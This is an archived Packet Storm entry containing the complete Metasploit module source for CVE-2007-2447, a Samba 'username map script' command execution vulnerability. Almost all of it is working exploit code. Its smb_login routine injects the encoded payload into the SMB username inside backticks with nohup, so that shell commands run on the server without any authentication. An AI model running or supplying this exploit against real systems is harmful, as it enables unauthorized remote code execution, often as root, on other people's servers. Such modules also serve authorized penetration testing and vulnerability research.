Samba "username map script" Command Execution

2010-02-17T00:00:00
ID PACKETSTORM:86413
Type packetstorm
Reporter jduck
Modified 2010-02-17T00:00:00

Description

                                        
                                            `##  
# $Id: usermap_script.rb 8510 2010-02-16 00:26:41Z jduck $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::SMB  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Samba "username map script" Command Execution',  
'Description' => %q{  
This module exploits a command execution vulerability in Samba  
versions 3.0.0 through 3.0.25rc3 when using the non-default  
"username map script" configuration option. By specifying a username  
containing shell meta characters, attackers can execute arbitrary  
commands.  
  
No authentication is needed to exploit this vulnerability since  
this option is used to map usernames prior to authentication!  
},  
'Author' => [ 'jduck' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 8510 $',  
'References' =>  
[  
[ 'CVE', '2007-2447' ],  
[ 'OSVDB', '34700' ],  
[ 'BID', '23972' ],  
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534' ],  
[ 'URL', 'http://samba.org/samba/security/CVE-2007-2447.html' ]  
],  
'Platform' => ['unix'],  
'Arch' => ARCH_CMD,  
'Privileged' => true, # root or nobody user  
'Payload' =>  
{  
'Space' => 1024,  
'DisableNops' => true,  
'Compat' =>  
{  
'PayloadType' => 'cmd',  
# *_perl and *_ruby work if they are installed  
# mileage may vary from system to system..  
}  
},  
'Targets' =>  
[  
[ "Automatic", { } ]  
],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'May 14 2007'))  
  
register_options(  
[  
Opt::RPORT(139)  
], self.class)  
  
end  
  
def smb_login  
# lol?  
username = "`nohup " + payload.encoded + "`"  
begin  
simple.login(datastore['SMBName'], username, datastore['SMBPass'], datastore['SMBDomain'])  
rescue XCEPT::LoginError  
# nothing :)  
end  
end  
  
def exploit  
  
connect  
smb_login  
  
handler  
  
end  
  
end  
`